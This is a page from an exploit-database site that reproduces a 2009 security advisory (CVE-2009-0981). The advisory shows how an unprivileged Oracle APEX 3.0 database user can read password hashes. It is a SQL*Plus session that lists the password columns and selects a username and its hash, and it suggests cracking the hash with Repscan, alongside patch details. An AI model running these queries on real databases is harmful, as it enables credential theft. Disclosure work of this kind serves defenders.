0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes
================================================================== Oracle APEX 3.2 Unprivileged DB users can see APEX password hashes ================================================================== Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation) Severity High Risk Category Password Disclosure Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) CVE CVE-2009-0981 Advisory 14 April 2009 (V 1.00) Details Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. Tested on 11.1.0.7. C:\> sqlplus dummy/dummy Connected to: Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production With the Partitioning, OLAP, Data Mining and Real Application Testing options SQL> select granted_role from user_role_privs; GRANTED_ROLE ------------------------------ CONNECT SQL> select owner,table_name from all_tables where owner='FLOWS_030000'; OWNER TABLE_NAME ------------------------------ ------------------------------ FLOWS_030000 WWV_FLOW_DUAL100 FLOWS_030000 WWV_FLOW_LOV_TEMP FLOWS_030000 WWV_FLOW_TEMP_TABLE Get a list of all columns containing the string "%PASSWORD%' SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%'; OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME -------------------------------------------------------------------------------- FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2 FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE 9 rows selected. SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS USER_NAME WEB_PASSWORD2 -------------------------------------------------------------------------------- YURI 141FA790354FB6C72802FDEA86353F31 This password hash can be checked using a tool like Repscan. Patch Information Apply the patches for Oracle CPU April 2009. History 13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Advisory published # 0day.today [2024-12-25] #